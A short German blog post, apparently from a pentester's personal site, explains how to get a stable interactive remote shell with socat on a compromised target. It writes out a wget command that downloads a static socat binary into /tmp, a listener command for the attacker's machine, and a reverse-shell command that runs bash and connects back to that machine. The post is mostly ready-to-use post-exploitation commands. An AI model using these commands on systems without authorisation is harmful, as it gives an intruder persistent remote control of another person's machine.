Mit socat eine Remote-Shell spawnen

Weil ich dummerweise gerade wieder Strg+C gedrückt habe und mir logischerweise die netcat Remote-Shell dadurch abgenippelt ist…

Entweder ist socat schon auf dem Pentest-Opfer installiert (was zu 0,00001% der Fall ist), oder einfach per wget das entsprechende Binary holen.

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

Wobei das /tmp-Verzeichnis nicht zwingend beschreibbar sein muß…
Ein chmod +x /tmp/socat dann aber auch nicht vergessen!
(sind noch ein paar ganz andere hilfreiche Binaries zu finden: https://github.com/andrew-d/static-binaries )

Auf dem eigenen Rechner (pentestrechner) dann

socat file:`tty`,raw,echo=0 tcp-listen:12345

Port 12345 ist durch einen beliebigen Port zu ersetzen, Hauptsache er ist von außen zu erreichen… ggf. Firewall/Router das Portforwading einrichten

Und mittels:
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:pentestrechner:12345
klappt es dann auch mit der Remote-Shell, die einem nicht einfach mit Ctrl+C wegstirbt 😛

Dein Kommentar:

» bevor Du Deinen Senf abgibst...
(solltest Du im eigenen Interesse angeklickt & gelesen haben...)


blog powered by wordpress
Design by Office and IT - Business Solutions
Optimiert durch suchmaschinen-freundlich

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Hilfe

Um meine Seite zu besuchen, mußt Du eine Wahl bzgl. der Cookies treffen.

  • Ale Cookies akzeptieren:
    Da kommt der ganze Tracking-Scheiss...
  • Nur first-party Cookies akzeptieren:
    Nur die Cookies meiner Wordpress-Installation.
  • Alle Cookies ablehnen >:-):
    Gar keine Cookies außer vielleicht so Session-Kram (ansonsten deaktiviere bitte Cookies im Webbrowser).

Mein Versprechen: Datenschutz.

Back